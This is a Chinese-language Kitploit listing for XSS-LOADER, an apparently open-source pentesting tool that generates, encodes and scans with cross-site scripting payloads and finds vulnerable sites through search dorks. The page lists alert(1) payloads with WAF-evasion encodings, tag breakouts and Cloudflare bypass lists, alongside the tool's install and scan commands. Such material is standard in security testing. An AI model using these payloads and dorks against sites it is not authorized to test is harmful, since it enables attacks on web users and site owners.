Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
工具/GitHubGitHub/capture0x/xss-loader
Web漏洞扫描器Payload生成Web应用程序漏洞利用WAF绕过渗透测试
GitHubcapture0x/xss-loader

XSS-LOADER

XSS Payload生成器 ~ XSS扫描器 ~ XSS Dork查找器

查看仓库
62112344个月前Kitploit 审核通过

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

💎   XSS-LOADER 工具   💎

作者:TMRSWRR

版本 1.0.0

XSS 载荷生成器 - XSS 扫描器 - XSS 后门查找器 的一体化工具

Instagram: TMRSWRR

📷 截图 📷

👇 💌 使用方法 💌 👇

使用方法

📒 自述 📒

  • 此工具用于生成 XSS 注入中使用的载荷
  • 从参数中选择默认载荷标签,或编写自己的载荷
  • 通过 XSS 扫描器参数进行 XSS 注入
  • 通过 XSS 后门查找器参数查找易受攻击的站点 URL

💿 安装 💿

使用 requirements.txt 进行安装

root@kitploit:~
git clone https://github.com/capture0x/XSS-LOADER/
cd XSS-LOADER
pip3 install -r requirements.txt

用法

root@kitploit:~
python3 payloader.py

🗃️ 功能 🗃️

*基本载荷

默认参数设置为:<script>alert(1)</script>

*Div 载荷

默认参数设置为:<div onpointerover='alert(1)'>MOVE HERE</div

*Img 载荷

默认参数设置为:``````

*Body 载荷

默认参数设置为:<body ontouchstart=alert(1)>

*Svg 载荷

默认参数设置为:<svg onload=alert('1')>

*输入你的载荷

对用户编写的载荷进行编码

*载荷生成器参数

对选定标签的载荷进行编码

root@kitploit:~
* |   1.  大写---->  <SCRIPT>ALERT(1)</SCRIPT>              
* |   2.  大小写混合----> <ScRiPt>aleRt(1)</ScRiPt>   
* |   3.  URL 编码 ----->   %3Cscript%3Ealert%281%29%3C%2Fscript%3E           
* |   4.  HTML 实体编码----->  &lt;script&gt;alert(1)&lt;/script&gt; 
* |   5.  拆分载荷 ----->  <scri</script>pt>>alert(1)</scri</script>pt>>       
* |   6.  十六进制编码 ----->  3c7363726970743e616c6572742831293c2f7363726970743e       
* |   7.  UTF-16 编码 -----> 将载荷编码为 utf-16 格式。   
* |   8.  UTF-32 编码----->  将载荷编码为 utf-32 格式。          
* |   9.  删除标签 -----> ";alert('XSS');//            
* |  10.  Unicode 编码----->    %uff1cscript%uff1ealert(1)%uff1c/script%uff1e         
* |  11.  US-ASCII 编码 ----->  ¼script¾alert(1)¼/script¾      
* |  12.  Base64 编码 ----->   PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg==          
* |  13.  UTF-7 编码 ----->   +ADw-script+AD4-alert(1)+ADw-/script+AD4-           
* |  14.  圆括号绕过 ----->  <script>alert`1`</script>   
* |  15.  UTF-8 编码 ----->  %C0%BCscript%C0%BEalert%CA%B91)%C0%BC/script%C0%BE          
* |  16.  标签块突破-----> "><script>alert(1)</script>
* |  17.  Script 突破----->  </script><script>alert(1)</script>
* |  18.  文件上传载荷-----> "><script>alert(1)</script>.gif
* |  19.  注释内绕过-----> <!--><script>alert(1)</script>-->
* |  20.  突变载荷-----> <noscript><p title="</noscript><script>alert(1)</script>">
* |  21.  畸形 img-----> <script>alert(1)</script>">
* |  22.  空格绕过-----> 
* |  23.  Downlevel-Hidden 块-----> <!--[if gte IE 4]><script>alert(1)</script><![endif]-->
* |  24.  WAF 绕过载荷-----> 显示 WAF 绕过载荷列表
* |  25.  Cloudflare 绕过载荷-----> 显示 Cloudflare 绕过载荷列表
* |  26.  多语言载荷-----> 显示多语言绕过载荷列表
* |  27.  弹窗载荷-----> 显示弹窗载荷列表
* |  28.  全部生成载荷-----> 显示所有生成的载荷
* |  29.  返回主菜单
* |  30.  退出

*XSS 扫描器

首先你需要输入目标的 URL 请按照以下示例输入 URL:例如 target -----> http://target.com/index.php?name= 选择用于扫描的载荷列表

  • 基本载荷列表 ==> 由 script 标签组成的载荷列表
  • Div 载荷列表 ==> 由 div 标签组成的载荷列表
  • Img 载荷列表 ==> 由 img 标签组成的载荷列表
  • Body 载荷列表 ==> 由 body 标签组成的载荷列表
  • Svg 载荷列表 ==> 由 svg 标签组成的载荷列表
  • 混合载荷列表 ==> 由所有标签组成的载荷列表
  • 输入文件路径 ==> 由用户指定的载荷列表,请按照以下示例输入 URL..! (例如 路径 -----> /usr/share/wordlists/wfuzz/Injections/XSS.txt)

扫描结果将添加到 "vulnpayload.txt" 文件中。

*XSS 后门查找器

首先输入用于搜索的后门: 例如---->inurl:"search.php?q=" 扫描结果将保存到 "dork.txt" 文件中。

已知问题

已修复:

  • Unicode 错误

  • 模块错误

重要提示:

如果你想在 Windows 系统上安装 Python3 使用此工具,请下载以下链接:

https://github.com/capture0x/XSS-LOADER-for-WINDOWS

错误与增强

如需报告错误或提出增强建议,请在此处打开 issue。

版权 2020

下载工具